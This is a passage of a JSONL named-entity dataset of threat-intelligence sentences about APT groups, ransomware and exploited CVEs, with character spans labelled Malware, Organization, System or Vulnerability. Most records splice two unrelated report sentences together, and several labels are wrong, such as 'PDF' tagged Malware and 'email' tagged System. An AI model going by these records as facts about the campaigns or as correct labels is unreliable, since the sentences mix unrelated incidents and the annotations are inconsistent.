The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 155, "end": 170, "label": "Malware"}]} {"text": "For example , the summer 2015 attack that used the unusual ' resume ' would not have been successful on Windows 10 as-is because of the presence of the Supervisor Mode Execution Prevention ( SMEP ) mitigation , even without the latest security updates installed . As this post and previous cited research show , APT groups such as Nitro will continue to evolve their techniques within the kill chain to avoid detection .", "spans": []} {"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . attacks on the chemical industry are merely their latest attack wave .", "spans": [{"start": 8, "end": 21, "label": "Vulnerability"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 195, "end": 212, "label": "Organization"}]} {"text": "For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes .", "spans": [{"start": 18, "end": 40, "label": "Vulnerability"}, {"start": 51, "end": 64, "label": "Vulnerability"}, {"start": 75, "end": 83, "label": "Organization"}]} {"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel\u00ae Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication . 
The attack wave started in late July 2011 and continued into midSeptember 2011 .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 71, "end": 79, "label": "Organization"}, {"start": 122, "end": 157, "label": "System"}, {"start": 160, "end": 163, "label": "System"}, {"start": 166, "end": 181, "label": "System"}, {"start": 184, "end": 187, "label": "System"}]} {"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication . The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 71, "end": 79, "label": "Organization"}, {"start": 122, "end": 156, "label": "System"}, {"start": 159, "end": 162, "label": "System"}, {"start": 165, "end": 180, "label": "System"}, {"start": 183, "end": 186, "label": "System"}]} {"text": "Until this incident , no malware had been discovered misusing the AMT SOL feature for communication . They then moved on to the motor industry in late May .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 128, "end": 142, "label": "Organization"}]} {"text": "We confirmed that the tool did not expose vulnerabilities in the management technology itself , but rather misused AMT SOL within target networks that have already been compromised to keep communication stealthy and evade security applications . From late April to early May , the attackers focused on human rights related NGOs .", "spans": [{"start": 323, "end": 327, "label": "Organization"}]} {"text": "In either case , PLATINUM would need to have gained administrative privileges on targeted systems prior to the feature 's misuse . 
Attackers then moved on to the motor industry in late May .", "spans": [{"start": 17, "end": 25, "label": "Organization"}, {"start": 162, "end": 176, "label": "Organization"}]} {"text": "The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast Asia\u2014PLATINUM is known to customize tools based on the network architecture of targeted organizations . At this point , the current attack campaign against the chemical industry began .", "spans": [{"start": 273, "end": 290, "label": "Organization"}]} {"text": "One possibility is that PLATINUM might have obtained compromised credentials from victim networks . The attackers first researched desired targets and then sent an email specifically to the target .", "spans": [{"start": 24, "end": 32, "label": "Organization"}]} {"text": "Another possibility is that the targeted systems did not have AMT provisioned and PLATINUM , once they've obtained administrative privileges on the system , proceeded to provision AMT . First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners .", "spans": [{"start": 62, "end": 65, "label": "System"}, {"start": 82, "end": 90, "label": "Organization"}]} {"text": "During the provisioning process , PLATINUM could select whichever username and password they wish . While the attackers used different pretexts when sending these malicious emails , two methodologies stood out .", "spans": [{"start": 34, "end": 42, "label": "Organization"}, {"start": 173, "end": 179, "label": "System"}]} {"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . 
Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update .", "spans": [{"start": 32, "end": 40, "label": "Organization"}, {"start": 77, "end": 95, "label": "System"}, {"start": 99, "end": 122, "label": "System"}, {"start": 125, "end": 135, "label": "Malware"}, {"start": 160, "end": 166, "label": "System"}]} {"text": "The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way . The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States .", "spans": [{"start": 4, "end": 17, "label": "System"}, {"start": 52, "end": 59, "label": "System"}, {"start": 203, "end": 206, "label": "System"}]} {"text": "Microsoft reiterates that the PLATINUM tool does not expose flaws in Intel\u00ae Active Management Technology ( AMT ) , but uses the technology within an already compromised network to evade security monitoring tools . Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 30, "end": 38, "label": "Organization"}, {"start": 69, "end": 104, "label": "System"}, {"start": 107, "end": 110, "label": "System"}, {"start": 246, "end": 249, "label": "Malware"}, {"start": 254, "end": 263, "label": "Malware"}, {"start": 305, "end": 318, "label": "Malware"}]} {"text": "The discovery of this new PLATINUM technique and the development of detection capabilities highlight the work the Windows Defender ATP team does to provide customers greater visibility into suspicious activities transpiring on their networks . 
This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 114, "end": 134, "label": "Organization"}]} {"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . The Sogu gang use a custom developed threat \u2013 Backdoor.Sogu , whereas the group described in this document use an off the shelf threat \u2013 Poison Ivy .", "spans": [{"start": 29, "end": 64, "label": "System"}, {"start": 131, "end": 148, "label": "Vulnerability"}, {"start": 371, "end": 384, "label": "Malware"}, {"start": 462, "end": 472, "label": "Malware"}]} {"text": "This signals just how long ago the Poseidon threat actor was already working on its offensive framework . The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails .", "spans": [{"start": 35, "end": 56, "label": "Organization"}, {"start": 140, "end": 143, "label": "Malware"}, {"start": 148, "end": 157, "label": "Malware"}, {"start": 186, "end": 192, "label": "System"}]} {"text": "However , Poseidon 's practice of being a ' custom-tailored malware implants boutique ' kept security researchers from connecting different campaigns under the umbrella of a single threat actor . 
These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 181, "end": 193, "label": "Organization"}, {"start": 234, "end": 250, "label": "Organization"}, {"start": 318, "end": 339, "label": "Organization"}, {"start": 346, "end": 372, "label": "Organization"}, {"start": 421, "end": 430, "label": "Organization"}, {"start": 442, "end": 468, "label": "Organization"}]} {"text": "Poseidon Group is dedicated to running targeted attacks campaigns to aggressively collect information from company networks through the use of spear-phishing packaged with embedded , executable elements inside office documents and extensive lateral movement tools . Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 299, "end": 314, "label": "Organization"}]} {"text": "The Poseidon Group is a long-running team operating on all domains : land , air , and sea . This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 128, "end": 143, "label": "Organization"}]} {"text": "The Poseidon Group has been active , using custom code and evolving their toolkit since at least 2005 . 
These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 43, "end": 54, "label": "System"}]} {"text": "Poseidon has maintained a consistently evolving toolkit since the mid-2000s . The attackers try to lure targets through spear phishing emails that include compressed executables .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 135, "end": 141, "label": "System"}]} {"text": "The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives . We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 275, "end": 286, "label": "Organization"}, {"start": 291, "end": 318, "label": "Organization"}]} {"text": "PROMETHIUM is an activity group that has been active as early as 2012 . Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 17, "end": 31, "label": "Organization"}, {"start": 82, "end": 108, "label": "Organization"}, {"start": 111, "end": 114, "label": "Organization"}]} {"text": "This malware family is known as \" PittyTiger \" by the anti-virus community . 
Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments .", "spans": [{"start": 34, "end": 44, "label": "Organization"}, {"start": 54, "end": 74, "label": "Organization"}, {"start": 142, "end": 152, "label": "Organization"}, {"start": 155, "end": 168, "label": "Organization"}, {"start": 173, "end": 198, "label": "Organization"}, {"start": 201, "end": 214, "label": "Organization"}]} {"text": "NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 16, "end": 30, "label": "Organization"}, {"start": 83, "end": 92, "label": "Organization"}, {"start": 96, "end": 104, "label": "System"}, {"start": 219, "end": 246, "label": "Organization"}]} {"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions \u2014 often including military installations , intelligence agencies , and other government bodies . 
The attacks appear to be geopolitically motivated and target high profile organizations .", "spans": [{"start": 107, "end": 113, "label": "Organization"}, {"start": 127, "end": 136, "label": "Organization"}, {"start": 141, "end": 149, "label": "Organization"}, {"start": 247, "end": 267, "label": "Organization"}, {"start": 272, "end": 284, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 328, "end": 349, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}, {"start": 443, "end": 469, "label": "Organization"}]} {"text": "PROMETHIUM distributed links through instant messengers , pointing recipients to malicious documents that invoked the exploit code to launch Truvasys on victim computers . The objective of the attacks is clearly espionage \u2013 they involve gaining access to top legislative , executive and judicial bodies around the world .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 141, "end": 149, "label": "System"}]} {"text": "PROMETHIUM is an activity group that has been active since at least 2012 . The attackers have targeted a large number of organizations globally since early 2017 , with the main focus on the Middle East and North Africa ( MENA ) , especially Palestine .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 17, "end": 31, "label": "Organization"}]} {"text": "In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched . 
The attacks were initially discovered while investigating a phishing attack that targeted political figures in the MENA region .", "spans": [{"start": 37, "end": 42, "label": "Organization"}, {"start": 101, "end": 114, "label": "Vulnerability"}, {"start": 298, "end": 307, "label": "Organization"}]} {"text": "Truvasys is a collection of modules written in the Delphi programming language , a variant of Pascal . Like BlackEnergy ( a.k.a. Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 94, "end": 100, "label": "System"}, {"start": 108, "end": 119, "label": "Malware"}, {"start": 129, "end": 137, "label": "Organization"}, {"start": 140, "end": 147, "label": "Organization"}, {"start": 152, "end": 157, "label": "Malware"}]} {"text": "While studying Truvasys , Microsoft uncovered a previously undocumented piece of malware known as Myntor that is a completely separate malware family . The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives .", "spans": [{"start": 15, "end": 23, "label": "System"}, {"start": 26, "end": 35, "label": "Organization"}, {"start": 98, "end": 104, "label": "System"}, {"start": 188, "end": 193, "label": "Malware"}]} {"text": "Unit 61486 is the 12th Bureau of the PLA 's 3rd General Staff Department ( GSD ) and is headquartered in Shanghai , China . The first Potao campaign that we examined took place in August 2011 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}]} {"text": "The CrowdStrike has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 . 
In March 2014 , the gang behind Potao started using a new infection vector .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 87, "end": 99, "label": "Organization"}, {"start": 184, "end": 189, "label": "Malware"}, {"start": 210, "end": 226, "label": "Malware"}]} {"text": "The CrowdStrike Intelligence team has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 . Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies .", "spans": [{"start": 4, "end": 28, "label": "Organization"}, {"start": 105, "end": 117, "label": "Organization"}, {"start": 189, "end": 193, "label": "Organization"}, {"start": 207, "end": 212, "label": "Malware"}, {"start": 275, "end": 285, "label": "Organization"}, {"start": 290, "end": 307, "label": "Organization"}, {"start": 339, "end": 352, "label": "Organization"}]} {"text": "This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . As confirmation that the malware writers are still very active even at the time of this writing , ESET detected a new Potao sample compiled on July 20 , 2015 .", "spans": [{"start": 166, "end": 175, "label": "Organization"}, {"start": 180, "end": 204, "label": "Organization"}, {"start": 305, "end": 309, "label": "Organization"}, {"start": 325, "end": 337, "label": "Malware"}]} {"text": "Parts of the PUTTER PANDA toolset and tradecraft have been previously documented , both by CrowdStrike , and in open source , where they are referred to as the MSUpdater group . 
In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of Win32/Potao and Win32/FakeTC samples .", "spans": [{"start": 13, "end": 25, "label": "Organization"}, {"start": 91, "end": 102, "label": "Organization"}, {"start": 160, "end": 175, "label": "Organization"}, {"start": 240, "end": 244, "label": "Organization"}, {"start": 285, "end": 296, "label": "Malware"}, {"start": 301, "end": 321, "label": "Malware"}]} {"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 39, "end": 44, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 119, "end": 126, "label": "Organization"}, {"start": 129, "end": 137, "label": "Organization"}, {"start": 144, "end": 162, "label": "Organization"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 255, "end": 275, "label": "Organization"}, {"start": 278, "end": 283, "label": "Malware"}, {"start": 408, "end": 415, "label": "Malware"}]} {"text": "According to the hacking collective , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks . 
Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the Trojan .", "spans": [{"start": 217, "end": 222, "label": "Malware"}, {"start": 521, "end": 527, "label": "Malware"}]} {"text": "The folders seem to contain information about the company 's development documentation , artificial intelligence model , web security software , and antivirus software base code . The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 20, "end": 39, "label": "Malware"}, {"start": 184, "end": 196, "label": "Organization"}]} {"text": "Targeting antivirus companies appears to have been the primary goal of Fxmps' latest network intrusions . The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": [{"start": 10, "end": 29, "label": "Organization"}, {"start": 110, "end": 122, "label": "Organization"}, {"start": 161, "end": 165, "label": "Malware"}]} {"text": "This period started with their seeming disappearance in October 2018 and concluded with their return in April 2019 . 
he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": [{"start": 120, "end": 126, "label": "Organization"}, {"start": 171, "end": 175, "label": "Malware"}]} {"text": "The hacker 's name is Gnosticplayers , and since February 11 the hacker has put up for sale data for 32 companies in three rounds [stories on Round 1 , Round 2 , and Round 3] on Dream Market , a dark web marketplace . PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release .", "spans": [{"start": 218, "end": 224, "label": "Organization"}, {"start": 307, "end": 311, "label": "Malware"}, {"start": 317, "end": 324, "label": "Malware"}, {"start": 329, "end": 338, "label": "Malware"}]} {"text": "But according to Gnosticplayers , his foray into a public marketplace like Dream has two goals --besides the first and obvious one being money . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": [{"start": 145, "end": 150, "label": "Organization"}, {"start": 169, "end": 183, "label": "Malware"}, {"start": 244, "end": 247, "label": "Malware"}, {"start": 255, "end": 262, "label": "Malware"}]} {"text": "Data collected by Secureworks incident response ( IR ) analysts and analyzed by CTU researchers indicates that GOLD LOWELL extorts money from victims using the custom SamSam ransomware . 
SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": [{"start": 18, "end": 29, "label": "Organization"}, {"start": 80, "end": 83, "label": "Organization"}, {"start": 111, "end": 122, "label": "Organization"}, {"start": 167, "end": 173, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 211, "end": 225, "label": "Malware"}, {"start": 286, "end": 289, "label": "Malware"}, {"start": 297, "end": 304, "label": "Malware"}]} {"text": "Some sources claimed that GOLD LOWELL operations specifically targeted the healthcare vertical following public SamSam incidents in 2016 and 2018 . The first new connection SPEAR identified was derived from an email address listed in Blue Coat Systems' original report on PassCV .", "spans": [{"start": 26, "end": 37, "label": "Organization"}, {"start": 75, "end": 85, "label": "Organization"}, {"start": 112, "end": 118, "label": "System"}, {"start": 173, "end": 178, "label": "Organization"}, {"start": 210, "end": 215, "label": "System"}, {"start": 272, "end": 278, "label": "Organization"}]} {"text": "However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform .", "spans": [{"start": 10, "end": 13, "label": "Organization"}, {"start": 38, "end": 49, "label": "Organization"}, {"start": 214, "end": 221, "label": "Organization"}]} {"text": "In January 2017 , GOLD LOWELL began targeting legitimate RDP account credentials , in some cases discovering and compromising accounts using brute-force techniques . 
The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations .", "spans": [{"start": 57, "end": 60, "label": "System"}, {"start": 170, "end": 176, "label": "Organization"}, {"start": 256, "end": 270, "label": "Organization"}]} {"text": "In 2015 and 2016 , GOLD LOWELL frequently exploited JBoss enterprise applications using several versions of this open-source JBoss exploitation tool . Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia .", "spans": [{"start": 52, "end": 57, "label": "System"}, {"start": 125, "end": 130, "label": "System"}, {"start": 175, "end": 181, "label": "Organization"}]} {"text": "In 2017 and early 2018 , the group used PowerShell commands to call Mimikatz from an online PowerSploit repository , which is a collection of publicly available PowerShell modules for penetration testing . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December .", "spans": [{"start": 40, "end": 59, "label": "System"}, {"start": 68, "end": 76, "label": "System"}, {"start": 161, "end": 179, "label": "System"}, {"start": 235, "end": 263, "label": "Organization"}]} {"text": "Gold Lowell responded by modifying a registry entry to disable the endpoint tool 's scanning functionality . 
The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 113, "end": 118, "label": "Indicator"}, {"start": 119, "end": 126, "label": "Vulnerability"}, {"start": 142, "end": 158, "label": "System"}, {"start": 175, "end": 188, "label": "Vulnerability"}]} {"text": "Gold Lowell then provide a download link to a unique XML executable file and corresponding RSA private key to decrypt the files . BBSRAT is typically packaged within a portable executable file , although in a few of the observed instances , a raw DLL was discovered to contain BBSRAT .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 53, "end": 72, "label": "System"}, {"start": 91, "end": 94, "label": "System"}, {"start": 130, "end": 136, "label": "Malware"}, {"start": 247, "end": 250, "label": "System"}, {"start": 277, "end": 283, "label": "Malware"}]} {"text": "This methodology , known as \" big game hunting \" , signals a shift in operations for WIZARD SPIDER , a criminal enterprise of which GRIM SPIDER appears to be a cell . WildFire properly classifies BBSRAT malware samples as malicious .", "spans": [{"start": 167, "end": 175, "label": "Organization"}, {"start": 196, "end": 218, "label": "Malware"}]} {"text": "The WIZARD SPIDER threat group , known as the Russia-based operator of the TrickBot banking malware , had focused primarily on wire fraud in the past . This week we will discuss another Chinese nexus adversary we call Samurai Panda .", "spans": [{"start": 4, "end": 30, "label": "Organization"}, {"start": 75, "end": 99, "label": "System"}]} {"text": "Similar to Samas and BitPaymer , Ryuk is specifically used to target enterprise environments . 
Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims .", "spans": [{"start": 11, "end": 16, "label": "System"}, {"start": 21, "end": 30, "label": "System"}, {"start": 33, "end": 37, "label": "System"}, {"start": 95, "end": 108, "label": "Organization"}]} {"text": "Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release . Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": [{"start": 36, "end": 40, "label": "System"}, {"start": 45, "end": 62, "label": "System"}, {"start": 78, "end": 82, "label": "System"}, {"start": 104, "end": 110, "label": "System"}, {"start": 247, "end": 258, "label": "Organization"}]} {"text": "Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors . Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": [{"start": 0, "end": 6, "label": "System"}]} {"text": "However , Ryuk is only used by GRIM SPIDER and , unlike Hermes , Ryuk has only been used to target enterprise environments . 
Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes .", "spans": [{"start": 10, "end": 14, "label": "System"}, {"start": 56, "end": 62, "label": "System"}, {"start": 65, "end": 69, "label": "System"}]} {"text": "Since Ryuk 's appearance in August , the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD . These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets .", "spans": [{"start": 6, "end": 10, "label": "System"}]} {"text": "Hermes ransomware , the predecessor to Ryuk , was first distributed in February 2017 . When conducting programmatic espionage activity , it can presumably become quite confusing if the attacker targets a heavy industry company , an avionics program , and seven other unique targets as to which infected host you will collect what information from .", "spans": [{"start": 0, "end": 17, "label": "System"}, {"start": 39, "end": 43, "label": "System"}, {"start": 204, "end": 226, "label": "Organization"}]} {"text": "In mid-August 2018 , a modified version of Hermes , dubbed Ryuk , started appearing in a public malware repository . These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module .", "spans": [{"start": 43, "end": 49, "label": "System"}, {"start": 59, "end": 63, "label": "System"}, {"start": 150, "end": 159, "label": "Malware"}, {"start": 169, "end": 195, "label": "Malware"}]} {"text": "Ryuk was tailored to target enterprise environments and some of the modifications include removing anti-analysis checks . 
Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 143, "end": 153, "label": "Organization"}, {"start": 183, "end": 191, "label": "Vulnerability"}, {"start": 192, "end": 210, "label": "System"}]} {"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files . Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" .", "spans": [{"start": 20, "end": 26, "label": "System"}, {"start": 30, "end": 34, "label": "System"}, {"start": 45, "end": 49, "label": "System"}, {"start": 84, "end": 87, "label": "System"}, {"start": 107, "end": 110, "label": "System"}, {"start": 127, "end": 140, "label": "Malware"}, {"start": 143, "end": 153, "label": "Organization"}, {"start": 233, "end": 242, "label": "Organization"}]} {"text": "For each mounted drive , Ryuk calls GetDriveTypeW to determine the drive 's type . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": [{"start": 25, "end": 29, "label": "System"}, {"start": 36, "end": 49, "label": "System"}, {"start": 83, "end": 92, "label": "Organization"}]} {"text": "To retrieve IP addresses that have ARP entries , Ryuk calls GetIpNetTable . 
ScarCruft has several ongoing operations , utilizing multiple exploits \u2014 two for Adobe Flash and one for Microsoft Internet Explorer .", "spans": [{"start": 49, "end": 53, "label": "System"}, {"start": 60, "end": 73, "label": "System"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 157, "end": 168, "label": "Malware"}, {"start": 181, "end": 208, "label": "Malware"}]} {"text": "Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA ( activities of which have been public reported as part of the \" Lazarus Group \" ) , because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017 . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": [{"start": 43, "end": 60, "label": "System"}, {"start": 212, "end": 218, "label": "System"}, {"start": 296, "end": 305, "label": "Organization"}]} {"text": "The two executables related to Hermes are bitsran.exe and RSW7B37.tmp . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 42, "end": 53, "label": "Malware"}, {"start": 58, "end": 69, "label": "Malware"}, {"start": 183, "end": 188, "label": "Vulnerability"}, {"start": 191, "end": 209, "label": "System"}, {"start": 210, "end": 217, "label": "Vulnerability"}]} {"text": "Falcon Intelligence has medium-high confidence that the GRIM SPIDER threat actors are operating out of Russia . 
Adobe Flash Player exploit .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 112, "end": 130, "label": "System"}, {"start": 131, "end": 138, "label": "Vulnerability"}]} {"text": "Based on these factors , there is considerably more evidence supporting the hypothesis that the GRIM SPIDER threat actors are Russian speakers and not North Korean . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April .", "spans": [{"start": 191, "end": 200, "label": "Organization"}, {"start": 218, "end": 226, "label": "Vulnerability"}, {"start": 227, "end": 234, "label": "Vulnerability"}, {"start": 237, "end": 250, "label": "Vulnerability"}]} {"text": "The hackers also started tweeting a few samples of internal emails from the company . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": [{"start": 121, "end": 133, "label": "System"}, {"start": 134, "end": 141, "label": "Vulnerability"}, {"start": 144, "end": 157, "label": "Vulnerability"}]} {"text": "From a process and file perspective , Hermes and Ryuk target files in a similar fashion . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": [{"start": 38, "end": 44, "label": "System"}, {"start": 49, "end": 53, "label": "System"}, {"start": 90, "end": 99, "label": "Organization"}, {"start": 138, "end": 150, "label": "System"}, {"start": 151, "end": 158, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}]} {"text": "Claudio Guarnieri , a security researcher who has investigated Hacking Team along with others at the Citizen Lab , was quick to point this out . 
Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 101, "end": 112, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}, {"start": 237, "end": 245, "label": "Vulnerability"}]} {"text": "The breach on Hacking Team comes almost a year after another surveillance tech company , the competing FinFisher , was hacked in a similar way , with a hacker leaking 40 Gb of internal files . After publishing our initial series of blogposts back in 2016 , Kaspersky have continued to track the ScarCruft threat actor .", "spans": [{"start": 103, "end": 112, "label": "Organization"}, {"start": 257, "end": 266, "label": "Organization"}, {"start": 295, "end": 304, "label": "Organization"}]} {"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor .", "spans": [{"start": 103, "end": 139, "label": "Malware"}]} {"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": [{"start": 19, "end": 25, "label": "System"}, {"start": 62, "end": 69, "label": "Organization"}, {"start": 152, "end": 165, "label": "Organization"}, {"start": 208, "end": 217, 